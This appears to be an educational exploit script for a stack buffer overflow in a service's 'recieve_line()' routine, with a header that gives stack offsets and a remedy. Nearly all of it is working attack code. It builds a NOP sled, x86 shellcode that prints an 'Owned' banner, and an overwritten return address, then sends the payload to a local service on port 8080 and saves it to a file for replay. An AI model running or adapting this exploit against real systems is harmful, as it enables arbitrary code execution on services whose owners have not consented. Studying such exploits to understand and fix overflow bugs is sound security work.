# Email : [email protected]
# Description : This exploit takes advantage of a stack buffer overflow caused by the missing
#               bounds check on the size of user input in 'recieve_line()'. The overflow corrupts
#               connection_handler()'s stack frame (saved EBP and return address), leading to
#               arbitrary code execution. The shellcode executed can be found in the shellcode directory.
# Remedy : To mitigate this attack, user input in recieve_line() must be properly validated
#          (bounds-checked against the destination buffer). Other mitigations provided by the OS
#          and compiler (e.g. a non-executable stack, ASLR, stack canaries) raise the bar but can
#          be bypassed under some circumstances, so they are not a substitute for the bounds check.
# Exploiting the stack frame of connection_handler()
# (stack addresses as observed on the target; they are environment-specific and will
#  differ with a different build or with ASLR enabled)
# esp: 0xbfffe710 ebp: 0xbffff2e8
# our input starts at address: 0xbfffeeec
# offset to saved ebp = 0xbffff2e8 - 0xbfffeeec = 1020 bytes
# offset to return address (saved eip) = (offset to ebp) + 4 = 1024 bytes
import socket
import struct
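# Injected 32-bit Linux x86 shellcode. The bytes decode roughly to:
#   jmp  +0x19             ; hop over the code to the `call` below
#   write(2, banner, 0x28) ; int 0x80 with eax=4, ebx=2, ecx=<banner addr>, edx=0x28
#   exit()                 ; int 0x80 with eax=1
#   call -0x1e             ; pushes the banner's address, consumed by `pop ecx`
#   "\n\n~~~~Owned~~~~by~~~~0xDarkMagician~~~~\n\n"
# Kept as bytes so it can be concatenated with struct.pack() output; the
# original str literals raise TypeError on Python 3 at the pack line.
shellcode = (
    b"\xeb\x19\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb0\x04\xb3\x02\x59\xb2\x28\xcd\x80"
    b"\x31\xc0\x89\xc3\xb0\x01\xcd\x80\xe8\xe2\xff\xff\xff"
    b"\x0a\x0a\x7e\x7e\x7e\x7e\x4f\x77\x6e\x65\x64\x7e\x7e\x7e\x7e\x62\x79"
    b"\x7e\x7e\x7e\x7e\x30\x78\x44\x61\x72\x6b\x4d\x61\x67\x69\x63\x69\x61\x6e"
    b"\x7e\x7e\x7e\x7e\x0a\x0a"
)
NOP = b"\x90"

# Per the frame layout in the header: the saved return address sits 1024 bytes
# past the start of our input, so everything before the address totals 1024 bytes.
RET_ADDR = 0xbffff010  # 0x124 bytes into our input, i.e. inside the leading NOP sled
SLED_TAIL = 100        # trailing NOPs between the shellcode and the saved EIP

# Layout: [NOP sled][shellcode][trailing NOPs][saved EIP] = 1024 + 4 bytes.
# The fixed RET_ADDR only works without ASLR, and landing in the sled requires
# an executable stack.
payload = NOP * (1024 - len(shellcode) - SLED_TAIL)
payload += shellcode
payload += NOP * SLED_TAIL
# "<I" pins a 4-byte little-endian word (the target is 32-bit x86) instead of
# relying on the host Python's native size and byte order.
payload += struct.pack("<I", RET_ADDR)  # overwrites the saved return address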
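# Deliver the payload to the vulnerable service on localhost:8080.
# sendall() keeps writing until the whole buffer is out (a plain send() may
# return after a partial write, leaving the saved EIP untouched), and the
# finally block closes the socket even if connect()/sendall() raise.
so = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    so.connect(('localhost', 8080))
    so.sendall(payload)
finally:
    so.close()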
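# Also keep the raw payload on disk so it can be replayed without this script:
#   $ (cat malacious_input; cat) | telnet localhost 8080
# "wb" avoids text-mode newline/encoding translation of the binary bytes, and
# the context manager closes the file even if the write fails.
with open('malacious_input', 'wb') as fo:
    fo.write(payload)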